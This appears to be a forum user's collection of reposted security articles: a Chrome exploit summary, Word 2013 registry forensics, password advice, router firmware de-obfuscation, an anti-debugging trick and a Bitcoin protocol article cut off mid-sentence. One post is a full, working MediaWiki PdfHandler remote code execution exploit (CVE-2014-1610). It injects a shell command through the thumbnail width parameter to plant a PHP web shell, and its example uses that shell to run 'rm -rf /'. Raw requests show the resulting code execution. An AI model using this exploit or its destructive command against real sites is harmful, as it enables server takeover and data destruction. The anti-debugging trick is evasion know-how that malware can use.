Everything posted by Nytro
-
[h=3]The registration marathon is now live![/h] https://olympic-ctf.ru/register
-
Mobile Pwn2Own Autumn 2013 Chrome on Android Exploit Writeup
ianbeer@chromium.org

tl;dr Pinkie Pie exploited an integer overflow in V8 when allocating TypedArrays, abusing dlmalloc inline metadata and JIT rwx memory to get reliable code execution. Pinkie then exploited a bug in a Clipboard IPC message where a renderer-supplied pointer was freed, getting code execution in the browser process by spraying multiple gigabytes of shared memory.

Download: https://docs.google.com/document/d/1tHElG04AJR5OR2Ex-m_Jsmc8S5fAbRB3s4RmTG_PFnw/edit
-
MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)
From: Pichaya Morimoto <pichaya () ieee org>
Date: Sat, 1 Feb 2014 22:28:51 +0700

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

####################################################################
#
# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)
# Reported by Netanel Rubin - Check Point's Vulnerability Research Group (Jan 19, 2014)
# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)
# Affected website : Wikipedia.org and more !
#
# Exploit author : Xelenonz & @u0x (Pichaya Morimoto)
# Release dates : Feb 1, 2014
# Special Thanks to 2600 Thailand !
#
####################################################################

# Exploit:
####################################################################
1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)
   http://vulnerable-site/index.php/Special:Upload
2. inject os cmd to upload a php-backdoor
   http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20"<?php%20system(\\$_GET[1]);">images/xnz.php`
3. access to php-backdoor!
   http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root
4. happy pwning!!

# Related files:
####################################################################
thumb.php                                    <-- extract all _GET array to params
/extensions/PdfHandler/PdfHandler_body.php   <-- failed to escape w/width options
/includes/media/ImageHandler.php
/includes/GlobalFunctions.php
includes/filerepo/file/File.php

# Vulnerability Analysis:
####################################################################
1. thumb.php
This script is used to resize images if it is configured to be done when the web browser requests the image.

<?
...
1.1 Called directly, use $_GET params
wfThumbHandleRequest();

1.2 Handle a thumbnail request via query parameters
function wfThumbHandleRequest() {
    $params = get_magic_quotes_gpc()
        ? array_map( 'stripslashes', $_GET )
        : $_GET;
    wfStreamThumb( $params ); // stream the thumbnail
}

1.3 Stream a thumbnail specified by parameters
function wfStreamThumb( array $params ) {
    ...
    $fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts uploaded.pdf file here
    ...
    // Backwards compatibility parameters
    if ( isset( $params['w'] ) ) {
        $params['width'] = $params['w']; // << Inject os cmd here!
        unset( $params['w'] );
    }
    ...
    $img = wfLocalFile( $fileName );
    ...
    // Thumbnail isn't already there, so create the new thumbnail...
    $thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image by width/height
    ...
    // Stream the file if there were no errors
    $thumb->streamFile( $headers );
    ...
?>

2. /includes/filerepo/file/File.php
<?
...
function transform( $params, $flags = 0 ) {
    ...
    $handler = $this->getHandler(); // << PDF Handler
    ...
    $normalisedParams = $params;
    $handler->normaliseParams( $this, $normalisedParams );
    ...
    $thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );
    ..
?>

3. /extensions/PdfHandler/PdfHandler_body.php
<?
...
function doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) {
    ...
    $width = $params['width'];
    ...
    $cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd & parameters
    $cmd .= " -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page} -dLastPage={$page}";
    $cmd .= " -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q " . wfEscapeShellArg( $srcPath );
    $cmd .= " | " . wfEscapeShellArg( $wgPdfPostProcessor );
    $cmd .= " -depth 8 -resize {$width} - "; // << FAILED to escape shell argument
    $cmd .= wfEscapeShellArg( $dstPath ) . ")";
    $cmd .= " 2>&1";
    ...
    $err = wfShellExec( $cmd, $retval );
    ...
?>

4. /includes/GlobalFunctions.php
Execute a shell command, with time and memory limits
<?
...
function wfShellExec( $cmd, &$retval = null, $environ = array(), $limits = array() ) {
    ...
    passthru( $cmd, $retval ); // << Execute here!!

POC:

GET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C?php%20system(\\$_GET[1]);%22%3Eimages/longcat.php` HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: my_wikiUserID=2; my_wikiUserName=Longcat; my_wiki_session=op3h2huvddnmg7gji0pscfsg02

<html><head><title>Error generating thumbnail</title></head>
<body>
<h1>Error generating thumbnail</h1>
<p>
?????????????????????????????: /bin/bash: -: command not found<br />
convert: option requires an argument `-resize' @ error/convert.c/ConvertImageCommand/2380.<br />
GPL Ghostscript 9.10: Unrecoverable error, exit code 1<br />
</p>
</body>
</html>

GET /mediawiki1221/images/longcat.php?1=id HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2; my_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1

uid=33(www-data) gid=33(www-data) groups=33(www-data)

# Back-end $cmd
####################################################################
GlobalFunctions.php : wfShellExec()

cmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150 -dBATCH -dNOPAUSE -q
'/var/www/mediawiki1221/images/2/27/Longcat.pdf' | '/usr/bin/convert' -depth 8 -resize
10|`echo "<?php system(\\$_GET[1]);">images/longcat.php` - '/tmp/transform_0e377aad0e27-1.jpg') 2>&1

Sursa: Full Disclosure: MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)
-
[h=3]MS Word 2013 Reading Locations[/h]
Microsoft Office 2013 introduced a new feature that allows a user to continue reading or editing a document starting at the last point he or she was working. This feature, referred to by some as "pick up where you left off", is a convenient way to jump to the location within a document that Word believes was being read or edited most recently before a file was closed. After opening a document and being greeted with the prompt pictured above, I was curious as to where this information is being tracked. After a bit of investigation, I located a set of registry subkeys specific to Office 2013 where this information is stored.

When a document in Word 2013 is closed, a registry subkey is created or updated in the "Software\Microsoft\Office\15.0\Word\Reading Locations" subkey of the current user's NTUSER.DAT. The subkey created should be named something similar to "Document 0", "Document 1", "Document 2", etc., as the number appended to the name of each subkey is incremented by one when a new document is closed. Each "Document #" subkey should contain 3 values that may be of interest to an examiner: "Datetime", "File Path", and "Position". All three values are stored as null-terminated Unicode strings.

[Screenshot of Reading Locations Subkey]

Datetime Value
The Datetime value corresponds to the local date and time the file was last closed. This value data is displayed in the format YYYY-MM-DD, followed by a "T", then HH:MM.

File Path Value
The File Path value is the fully qualified file name.

Position Value
The Position value appears to store the positioning data used to place the cursor at the point in the document "where you left off". It appears that the second number in this value data is used to denote the location within the document. For example, if a file is opened for the first time and then closed again without scrolling down through the document, the Position value data should be "0 0". If a file is opened and the user scrolls down a bit through the document before closing it, the Position value data may be something like "0 1500". The second number in this value data appears to increase as the user scrolls through (i.e. reads/edits) the document. Note that positioning of the cursor does not seem to have an impact on this value. That is, the second field in this value data increases even if the cursor is never moved from the beginning of the document.

[h=4]Forensic Implications[/h]
Fifty unique files (based on fully qualified file name) can be tracked in the Reading Locations subkeys. Each time a document in Word 2013 is closed, regardless of the version of Word that created the file, a Reading Locations subkey should be added or updated. It should be noted, however, that files accessed from a user's SkyDrive do not appear to be tracked in the Reading Locations subkey. If the file referenced by the "File Path" value data of any subkey is opened and closed again, the corresponding value data is updated, however, the organization of the "Document #" subkeys remains unchanged (i.e. "Document 0" is not shifted to "Document 1", etc.). Interestingly, it appears that when the 51st document is opened, the "Document 49" subkey is overwritten, leaving data from the other subkeys untouched. This LIFO rotation may have some interesting effects on examination, as it lends itself to preserving more historical data while recent activity is more likely to be overwritten.

Posted by Jason Hale at 11:51 PM
Sursa: Digital Forensics Stream: MS Word 2013 Reading Locations
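Following up on the registry layout described in the post above, a few lines of Python using the standard winreg module can walk the "Document #" subkeys on a live Windows system. This is only a hedged sketch of what an examiner's tooling might do; it reads the live HKCU hive rather than an offline NTUSER.DAT, and assumes the three value names quoted in the post.

```python
import winreg  # Python 3, Windows only

path = r"Software\Microsoft\Office\15.0\Word\Reading Locations"
with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as root:
    subkey_count = winreg.QueryInfoKey(root)[0]        # number of "Document #" subkeys
    for i in range(subkey_count):
        name = winreg.EnumKey(root, i)                  # e.g. "Document 0"
        with winreg.OpenKey(root, name) as doc:
            dt, _ = winreg.QueryValueEx(doc, "Datetime")     # local close time, YYYY-MM-DDTHH:MM
            fp, _ = winreg.QueryValueEx(doc, "File Path")    # fully qualified file name
            pos, _ = winreg.QueryValueEx(doc, "Position")    # "0 0", "0 1500", ...
            print(name, dt, pos, fp)
```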
-
Yahoo Hacked And How To Protect Your Passwords
James Lyne, Contributor

Yahoo yesterday announced that Yahoo mail has been the focus of a co-ordinated hack and that at this time it has confirmed a number of users' e-mail accounts have been compromised – you may be one of them (and if you are, see below for my top tips on how to secure your passwords going forward). It is not clear how many users have been compromised, or exactly how. Yahoo don't have a history of providing much information, but it would be prudent for any Yahoo mail users to take precautions (more on that below).

Between the vague statements about malicious code and "a third party was probably to blame", Yahoo has been resetting the credentials of affected users via e-mail and SMS if your mobile is on file. Whilst details are scarce at this time, this continues a trend of bad security and resilience news for Yahoo, who experienced a multitude of issues in 2013. The company made clear in their announcement that a third party database with shared credentials was likely the source and that they had no evidence the usernames and passwords were taken directly from their systems. Whether the third party was one they provided data to, or whether it was a random third party with shared credentials, is not particularly clear. There is insufficient detail to lay blame at this time, but certainly it would be prudent to take steps to secure yourself.

More broadly, the last couple of years have seen a significant spike in the theft of passwords (or their hashed or encrypted representations) from online services as cyber criminals moved beyond financial information as their sole form of profit. Whilst we all wait with bated breath for further details of the compromise, now would be a very good time to upgrade your password. Many providers are very behind the times on password security, but at least you can take steps to minimise the risks. Here are a few tips on how to do it:

Avoid using the same password across multiple sites and services. That way, if Yahoo credentials are breached, hackers won't be able to jump across into your Twitter, online banking, work accounts or the like. I know this presents a memory challenge for some users, but see the below tip on password managers.

Choose a password which is not easy to guess. Words with a dictionary root followed by numerals are very common choices and predictable patterns that cyber criminals can use to crack your password very fast. Passwords should be long, phrase-based and involve a balance of different types of characters – numbers, letters, capitals and ideally a few symbols. See my fabulous example below.

Set up password change/reset mechanisms properly – not obviously. Password reset forms on many services ask questions like "Where did you go to school?" or "In which year were you born?". These questions are easy to answer and can typically be mined from social media pages or the Internet – why would hackers guess your password if they can just tell a system where you went to school and how old you are (you did after all announce your birthday last year on Twitter and your age, didn't you?). Instead I suggest lying on the Internet. Come up with a scheme of answers to these questions that you won't forget (or store securely) or, better still, if the service allows, specify your own difficult questions.

Bigger = better! When passwords are stolen from providers they are typically in a hashed or encrypted form, a bit like this: 5f4dcc3b5aa765d61d8327deb882cf99. This is a hashed password representation, and using clever techniques and computing power attackers can recover the original password and log in to your account. When they steal these hashes it is only a matter of time and effort until they reveal the original. Short passwords might be guessed in seconds to minutes or hours (it depends on the implementation), whereas very long passwords could take years of work (and the cyber criminals are likely to go after someone else). Therefore making your password 60 characters makes life much harder for the cyber criminals if they do manage to break into a service like Yahoo. This of course all assumes the provider isn't just storing your password in clear text – in which case you will be very glad of tip number 1!

Use a password manager. Password managers generate strong unique passwords for each of your services and then store them in an encrypted database which you can unlock with one good master password. It is a reasonable compromise for those that do not have an amazing memory but don't want to fall into the pitfall of repeating similar passwords across multiple sites. See below for more information on how this works.

Register with a breach monitoring service. There are a variety of services on the Internet now which monitor for visible lists of stolen usernames/passwords. Of course, not all breaches are visible, so it is far from a complete list. That said, if your username shows up it will e-mail you a notification and tell you it is time to change.

Despite numerous proposals of authentication mechanisms to replace the password, it is still the cheapest, easiest-to-deploy, most ubiquitous form of authentication used. So we should all take some steps to make sure we are using them properly. A good password manager allows you to generate secure passwords for each of your sites and avoid duplication – luckily you don't have to type these beastly long passwords out, the tools do that for you. Here is an example of a password recipe for a new password:

[A password recipe for a new password, courtesy of 1Password for Mac OS X]

You can specify the length of the password (some providers don't allow unlimited length but arbitrarily restrict you to say 16 characters, e.g. Microsoft 365 Exchange. Grumble grumble.) and the make-up of symbols and numbers. You can even make it pronounceable for a situation where you might have to actually read the password out (though I don't recommend this for obvious reasons). Each time you click the button you get a nice new secure password which the password manager automatically associates with the website in question, so that you can auto log in each time remembering just one secure password you specify.

Not all password managers are created equal, so it is worth shopping around a little before you commit, but these tools can take the average user's password security from poor to really rather good in an afternoon password changing party. Lastly, it is important you keep a backup of the encrypted password database (losing all your passwords in one place would be painful) and you may want to think twice about putting the keys to your whole life in there – my banking details, for example, would not be in this application.

So why not make something good from another password breach and share these tips with your friends, family and colleagues. I await with bated breath news from a reader that they've successfully made all their passwords over 128 characters.

Sursa: Yahoo Hacked And How To Protect Your Passwords - Forbes
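Incidentally, the example hash quoted in the article is the unsalted MD5 of one of the most common passwords there is, which is exactly the article's point about guessable passwords falling in seconds. As a hedged illustration (not part of the article), a toy dictionary check in Python recovers it instantly:

```python
import hashlib

stolen = '5f4dcc3b5aa765d61d8327deb882cf99'   # the example hash from the article
wordlist = ['123456', 'letmein', 'qwerty', 'password']  # tiny stand-in dictionary

for guess in wordlist:
    # unsalted MD5, as used in the article's example; real sites should use a slow, salted hash
    if hashlib.md5(guess.encode()).hexdigest() == stolen:
        print('cracked:', guess)
        break
```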
-
XSS and MySQL FILE
Difficulty: Beginner

Details
This exercise explains how you can use a Cross-Site Scripting vulnerability to get access to an administrator's cookies. Then how you can use his/her session to gain access to the administration to find a SQL injection and gain code execution using it.

What you will learn?
Cross-Site Scripting exploitation
MySQL injection with FILE privilege

Requirements
A computer with a virtualisation software
A basic understanding of HTTP
A basic understanding of PHP
Yes, that's it!

Download
xss_and_mysql_file.pdf (579K)
xss_and_mysql_file.iso (64-bit, 189M, MD5: e95459511a4aebb51d0de6cd04a016df)
xss_and_mysql_file_i386.iso (32-bit, 178M, MD5: c9c7a31ab9bf79b82b72b58bb0a3a657)

Sursa: https://pentesterlab.com/exercises/xss_and_mysql_file/
-
Reversing the WRT120N’s Firmware Obfuscation By Craig | February 2, 2014 It was recently brought to my attention that the firmware updates for the Linksys WRT120N were employing some unknown obfuscation. I thought this sounded interesting and decided to take a look. The latest firmware update for the WRT120N didn’t give me much to work with: Binwalk firmware update analysis As you can see, there is a small LZMA compressed block of data; this turned out to just be the HTML files for the router’s web interface. The majority of the firmware image is unidentified and very random. With nothing else to go on, curiosity got the best of me and I ordered one (truly, Amazon Prime is not the best thing to ever happen to my bank account). Hardware Analysis A first glance at the hardware showed that the WRT120N had a Atheros AR7240 SoC, a 2MB SPI flash chip, 32MB of RAM, and what appeared to be some serial and JTAG headers: WRT120N PCB Looking to get some more insight into the device’s boot process, I started with the serial port: UART Header I’ve talked about serial ports in detail elsewhere, so I won’t dwell on the methods used here. However, with a quick visual inspection and a multimeter it was easy to identify the serial port’s pinout as: Pin 2 – RX Pin 3 – TX Pin 5 – Ground The serial port runs at 115200 baud and provided some nice debug boot info: $ sudo miniterm.py /dev/ttyUSB0 115200 --- Miniterm on /dev/ttyUSB0: 115200,8,N,1 --- --- Quit: Ctrl+] | Menu: Ctrl+T | Help: Ctrl+T followed by Ctrl+H --- ======================================================================= Wireless Router WG7005G11-LF-88 Loader v0.03 build Feb 5 2009 15:59:08 Arcadyan Technology Corporation ======================================================================= flash MX25L1605D found. Copying boot params.....DONE Press Space Bar 3 times to enter command mode ... Flash Checking Passed. Unzipping firmware at 0x80002000 ... [ZIP 3] [ZIP 1] done In c_entry() function ... install_exception install exception handler ... install interrupt handler ... ulVal: 0x484fb Set GPIO #11 to OUTPUT Set GPIO #1 to OUTPUT Set GPIO #0 to OUTPUT Set GPIO #6 to INPUT Set GPIO #12 to INPUT Timer 0 is requested ##### _ftext = 0x80002000 ##### _fdata = 0x80447420 ##### __bss_start = 0x804D5B04 ##### end = 0x81869518 ##### Backup Data from 0x80447420 to 0x81871518~0x818FFBFC len 583396 ##### Backup Data completed ##### Backup Data verified [INIT] HardwareStartup .. [INIT] System Log Pool startup ... [INIT] MTinitialize .. CPU Clock 350000000 Hz init_US_counter : time1 = 270713 , time2 = 40272580, diff 40001867 US_counter = 70 cnt1 41254774 cnt2 41256561, diff 1787 Runtime code version: v1.0.04 System startup... [INIT] Memory COLOR 0, 1600000 bytes .. [INIT] Memory COLOR 1, 1048576 bytes .. [INIT] Memory COLOR 2, 2089200 bytes .. [INIT] tcpip_startup .. Data size: 1248266 e89754967e337d9f35e8290e231c9f92 Set flash memory layout to Boot Parameters found !!! Bootcode version: v0.03 Serial number: JUT00L602233 Hardware version: 01A ... The firmware looked to have been made by Arcadyan, and the ‘Unzipping firmware…’ message was particularly interesting; a bit of Googling turned up this post on reversing Arcadyan firmware obfuscation, though it appears to be different from the obfuscation used by the WRT120N. The only interaction with the serial port was via the bootloader menu. 
During bootup you can break into the bootloader menu (press the space bar three times when prompted) and perform a few actions, like erasing flash and setting board options: Press Space Bar 3 times to enter command mode ...123 Yes, Enter command mode ... [WG7005G11-LF-88 Boot]:? ====================== [U] Upload to Flash [E] Erase Flash [G] Run Runtime Code [A] Set MAC Address [#] Set Serial Number [V] Set Board Version [H] Set Options [P] Print Boot Params [I] Load ART From TFTP [1] Set SKU Number [2] Set PIN Number ====================== Unfortunately, the bootloader doesn’t appear to provide any options for dumping the contents of RAM or flash. Although there is a JTAG header on the board, I opted for dumping the flash chip directly since JTAG dumps tend to be slow, and interfacing directly with SPI flash is trivial. Pretty much anything that can speak SPI can be used to read the flash chip; I used an FTDI C232HM cable and the spiflash.py utility included with libmpsse: $ sudo spiflash --read=flash.bin --size=$((0x200000)) --verify FT232H Future Technology Devices International, Ltd initialized at 15000000 hertz Reading 2097152 bytes starting at address 0x0...saved to flash.bin. Verifying...success. The flash chip contains three LZMA compressed blocks and some MIPS code, but the main firmware image is still unknown: Flash analysis The first two blocks of LZMA compressed data are part of an alternate recovery image, and the MIPS code is the bootloader. Besides some footer data, the rest of the flash chip simply contains a verbatim copy of the firmware update file. Bootloader Analysis The bootloader, besides being responsible for de-obfuscating and loading the firmware image into memory, contains some interesting tidbits. I’ll skip the boring parts in which I find the bootloader’s load address, manually identify standard C functions, resolve jump table offsets, etc, and get to the good stuff. First, very early in the boot process, the bootloader checks to see if the reset button has been pressed. If so, it starts up the “Tiny_ETCPIP_Kernel” image, which is the small LZMA-compressed recovery image, complete with a web interface: Unzipping Tiny Kernel This is nice to know; if you ever end up with a bad firmware update, holding the reset button during boot will allow you to un-brick your router. There is also a hidden administrator mode in the bootloader’s UART menu: Hidden bootloader menu Entering an option of ! will enable “administrator mode”; this unlocks a few other options, including the ability to read and write to memory: [WG7005G11-LF-88 Boot]:! Enter Administrator Mode ! ====================== [U] Upload to Flash [E] Erase Flash [G] Run Runtime Code [M] Upload to Memory [R] Read from Memory [W] Write to Memory [Y] Go to Memory [A] Set MAC Address [#] Set Serial Number [V] Set Board Version [H] Set Options [P] Print Boot Params [I] Load ART From TFTP [1] Set SKU Number [2] Set PIN Number ====================== [WG7005G11-LF-88 Boot]: The most interesting part of the bootloader, of course, is the code that loads the obfuscated firmware image into memory. 
Obfuscation Analysis

De-obfuscation is performed by the load_os function, which is passed a pointer to the obfuscated image as well as an address where the image should be copied into memory. The de-obfuscation routine inside load_os is not complicated:

[De-obfuscation routine]

Basically, if the firmware image starts with the bytes 04 01 09 20 (which our obfuscated firmware image does), it enters the de-obfuscation routine which:

1. Swaps the two 32-byte blocks of data at offsets 0x04 and 0x68.
2. Nibble-swaps the first 32 bytes starting at offset 0x04.
3. Byte-swaps each of the adjacent 32 bytes starting at offset 0x04.

At this point, the data at offset 0x04 contains a valid LZMA header, which is then decompressed. Implementing a de-obfuscation tool was trivial, and the WRT120N firmware can now be de-obfuscated and de-compressed:

$ ./wrt120n ./firmware/FW_WRT120N_1.0.07.002_US.bin ./deobfuscated.bin
Doing block swap...
Doing nibble-swap...
Doing byte-swap...
Saving data to ./deobfuscated.bin...
Done!

[Analysis of de-obfuscated firmware]

The de-obfuscation utility can be downloaded here for those interested.

Sursa: Reversing the WRT120N's Firmware Obfuscation - /dev/ttyS0
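For readers who want to follow along, here is a hedged Python re-implementation of the three steps listed above. The exact byte ranges are my reading of that description; the author's own wrt120n tool, linked above, is the reference implementation.

```python
import sys

MAGIC = b'\x04\x01\x09\x20'   # header bytes that mark an obfuscated image, per the post

def deobfuscate(data):
    buf = bytearray(data)
    assert buf[:4] == MAGIC, "not an obfuscated WRT120N image"
    # 1. swap the two 32-byte blocks at offsets 0x04 and 0x68
    buf[0x04:0x24], buf[0x68:0x88] = buf[0x68:0x88], buf[0x04:0x24]
    # 2. nibble-swap the 32 bytes starting at offset 0x04
    for i in range(0x04, 0x24):
        buf[i] = ((buf[i] << 4) | (buf[i] >> 4)) & 0xFF
    # 3. byte-swap each adjacent pair within that same 32-byte region
    for i in range(0x04, 0x24, 2):
        buf[i], buf[i + 1] = buf[i + 1], buf[i]
    return bytes(buf)

if __name__ == '__main__':
    out = deobfuscate(open(sys.argv[1], 'rb').read())
    open(sys.argv[2], 'wb').write(out)   # data at 0x04 should now start with an LZMA header
```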
-
Anti-Debugging trick : Checking for the Low Fragmentation Heap

Hi everyone, today I'll introduce an anti-debugging trick whose idea came to me while debugging the Windows heap. I don't know if it has been used anywhere before, but here it is. Check the C/C++ source code: [C++] LFH anti-debugging trick - Pastebin.com

Short introduction to the Windows front end allocator:

First of all, let me define what the LFH (Low Fragmentation Heap) is. The LFH was introduced in Windows XP and Windows Server 2003, but it wasn't used as the default front end allocator until Windows Vista. The default front end allocator before that was the lookaside lists (LAL); each of these two is a singly linked list with 128 entries. The LFH, as its name suggests, is implemented to guarantee that heap fragmentation is reduced, and it is strongly recommended for applications that allocate a large number of small blocks. When the LFH is first created, predetermined sizes of memory are allocated and put into buckets (LFH entries); when the application asks for an allocation, the LFH provides the smallest available block that satisfies it, otherwise the request is passed to the heap manager and then to the FreeLists (see the explanation below). When the LAL is used as the front end allocator, a block won't end up in one of its lists until it has been allocated (either from the FreeLists or by committing memory) and then freed, and only if a list of the lookaside table can handle the freed block; otherwise it is passed to the heap manager, which performs coalescing if two adjacent blocks are free, changes bitmap values, invalidates the coalesced block's entry and then inserts the coalesced block into its valid list in the FreeLists. If no block coalescing is possible, the block is inserted directly into the FreeLists.

Anti-Debugging Trick:

I noticed that when the executable is run under a debugger, no Low Fragmentation Heap (LFH) is created for it, so the pointer to the LFH equals NULL. So we just have to check whether the pointer to the LFH is null to detect if the process was created inside a debugger. I then tried running the process outside the debugger and attaching to it, and noticed that an LFH is created for the heap and the pointer to the LFH is valid. The pointer to the LFH is located at "heap_handle+0xd4" under Windows 7 for 32-bit executables and at "heap_handle+0x178" for 64-bit executables.

I attached the debugger to the process:

0:001> dt _HEAP 00460000
ntdll!_HEAP
   +0x000 Entry : _HEAP_ENTRY
   +0x008 SegmentSignature : 0xffeeffee
   +0x00c SegmentFlags : 0
   [...]
   +0x0d0 CommitRoutine : 0x5b16148e
   +0x0d4 FrontEndHeap : 0x00468cf0 Void   <-- Pointer to the FEA
   +0x0d8 FrontHeapLockCount : 0
   +0x0da FrontEndHeapType : 0x2           <-- Type : LFH
   +0x0dc Counters : _HEAP_COUNTERS
   +0x130 TuningParameters : _HEAP_TUNING_PARAMETERS

When running the process from the debugger, the LFH won't be enabled:

0:001> dt _HEAP 00320000
ntdll!_HEAP
   +0x000 Entry : _HEAP_ENTRY
   +0x008 SegmentSignature : 0xffeeffee
   +0x00c SegmentFlags : 0
   [...]
   +0x0cc LockVariable : 0x00320138 _HEAP_LOCK
   +0x0d0 CommitRoutine : 0x6d58ec0e long +6d58ec0e
   +0x0d4 FrontEndHeap : (null)
   +0x0d8 FrontHeapLockCount : 0
   +0x0da FrontEndHeapType : 0
   +0x0dc Counters : _HEAP_COUNTERS
   +0x130 TuningParameters : _HEAP_TUNING_PARAMETERS

Remember that the LFH isn't used by default until Windows Vista and later versions, so to implement the anti-debugging technique under Windows XP we'll need to enable the LFH ourselves. To do so, simply call HeapSetInformation with the HEAP_INFORMATION_CLASS set to 0 and with the information buffer containing the value 2, which enables the LFH for the heap passed as the first argument. A simple way to bypass this technique is to attach the debugger to the application instead of running it from a debugger.

More details on the LFH: here

Thanks for your time,
Souhail Hammou.

Sursa: Anti-Debugging trick : Checking for the Low Fragmentation Heap - ITSecurity.ma - Information Security and Ethical Hacking Community
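As a hedged companion to the linked C/C++ code, the same check can be sketched in Python with ctypes (Windows only). The offsets are the ones quoted in the post for Windows 7; the warm-up allocations are my own precaution to give the front end a chance to initialise and are not part of the original trick.

```python
import ctypes

kernel32 = ctypes.windll.kernel32
kernel32.GetProcessHeap.restype = ctypes.c_void_p
kernel32.HeapAlloc.restype = ctypes.c_void_p
kernel32.HeapAlloc.argtypes = [ctypes.c_void_p, ctypes.c_ulong, ctypes.c_size_t]

heap = kernel32.GetProcessHeap()

# A burst of small same-sized allocations, so the front end comes up if it is going to
# (my own precaution, not part of the original trick).
for _ in range(0x400):
    kernel32.HeapAlloc(heap, 0, 0x30)

# FrontEndHeap pointer offsets quoted in the post: 0xd4 (32-bit Win7), 0x178 (64-bit)
offset = 0xD4 if ctypes.sizeof(ctypes.c_void_p) == 4 else 0x178
front_end_heap = ctypes.c_void_p.from_address(heap + offset).value

if front_end_heap is None:
    print("FrontEndHeap is NULL -> process was probably started under a debugger")
else:
    print("FrontEndHeap = %#x -> no debugger detected at start-up" % front_end_heap)
```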
-
Bitcoins the hard way: Using the raw Bitcoin protocol All the recent media attention on Bitcoin inspired me to learn how Bitcoin really works, right down to the bytes flowing through the network. Normal people use software[1] that hides what is really going on, but I wanted to get a hands-on understanding of the Bitcoin protocol. My goal was to use the Bitcoin system directly: create a Bitcoin transaction manually, feed it into the system as hex data, and see how it gets processed. This turned out to be considerably harder than I expected, but I learned a lot in the process and hopefully you will find it interesting. This blog post starts with a quick overview of Bitcoin and then jumps into the low-level details: creating a Bitcoin address, making a transaction, signing the transaction, feeding the transaction into the peer-to-peer network, and observing the results. A quick overview of Bitcoin I'll start with a quick overview of how Bitcoin works[2], before diving into the details. Bitcoin is a relatively new digital currency[3] that can be transmitted across the Internet. You can buy bitcoins[4] with dollars or other traditional money from sites such as Coinbase or MtGox[5], send bitcoins to other people, buy things with them at some places, and exchange bitcoins back into dollars. To simplify slightly, bitcoins consist of entries in a distributed database that keeps track of the ownership of bitcoins. Unlike a bank, bitcoins are not tied to users or accounts. Instead bitcoins are owned by a Bitcoin address, for example 1KKKK6N21XKo48zWKuQKXdvSsCf95ibHFa. Bitcoin transactions A transaction is the mechanism for spending bitcoins. In a transaction, the owner of some bitcoins transfers ownership to a new address. A key innovation of Bitcoin is how transactions are recorded in the distributed database through mining. Transactions are grouped into blocks and about every 10 minutes a new block of transactions is sent out, becoming part of the transaction log known as the blockchain, which indicates the transaction has been made (more-or-less) official.[6] Bitcoin mining is the process that puts transactions into a block, to make sure everyone has a consistent view of the transaction log. To mine a block, miners must find an extremely rare solution to an (otherwise-pointless) cryptographic problem. Finding this solution generates a mined block, which becomes part of the official block chain. Mining is also the mechanism for new bitcoins to enter the system. When a block is successfully mined, new bitcoins are generated in the block and paid to the miner. This mining bounty is large - currently 25 bitcoins per block (about $19,000). In addition, the miner gets any fees associated with the transactions in the block. Because of this, mining is very competitive with many people attempting to mine blocks. The difficulty and competitiveness of mining is a key part of Bitcoin security, since it ensures that nobody can flood the system with bad blocks. The peer-to-peer network There is no centralized Bitcoin server. Instead, Bitcoin runs on a peer-to-peer network. If you run a Bitcoin client, you become part of that network. The nodes on the network exchange transactions, blocks, and addresses of other peers with each other. When you first connect to the network, your client downloads the blockchain from some random node or nodes. In turn, your client may provide data to other nodes. 
When you create a Bitcoin transaction, you send it to some peer, who sends it to other peers, and so on, until it reaches the entire network. Miners pick up your transaction, generate a mined block containing your transaction, and send this mined block to peers. Eventually your client will receive the block and your client shows that the transaction was processed. Cryptography Bitcoin uses digital signatures to ensure that only the owner of bitcoins can spend them. The owner of a Bitcoin address has the private key associated with the address. To spend bitcoins, they sign the transaction with this private key, which proves they are the owner. (It's somewhat like signing a physical check to make it valid.) A public key is associated with each Bitcoin address, and anyone can use it to verify the digital signature. Blocks and transactions are identified by a 256-bit cryptographic hash of their contents. This hash value is used in multiple places in the Bitcoin protocol. In addition, finding a special hash is the difficult task in mining a block. Bitcoins do not really look like this. Photo credit: Antana, CC:by-sa Diving into the raw Bitcoin protocol The remainder of this article discusses, step by step, how I used the raw Bitcoin protocol. First I generated a Bitcoin address and keys. Next I made a transaction to move a small amount of bitcoins to this address. Signing this transaction took me a lot of time and difficulty. Finally, I fed this transaction into the Bitcoin peer-to-peer network and waited for it to get mined. The remainder of this article describes these steps in detail. It turns out that actually using the Bitcoin protocol is harder than I expected. As you will see, the protocol is a bit of a jumble: it uses big-endian numbers, little-endian numbers, fixed-length numbers, variable-length numbers, custom encodings, DER encoding, and a variety of cryptographic algorithms, seemingly arbitrarily. As a result, there's a lot of annoying manipulation to get data into the right format.[7] The second complication with using the protocol directly is that being cryptographic, it is very unforgiving. If you get one byte wrong, the transaction is rejected with no clue as to where the problem is.[8] The final difficulty I encountered is that the process of signing a transaction is much more difficult than necessary, with a lot of details that need to be correct. In particular, the version of a transaction that gets signed is very different from the version that 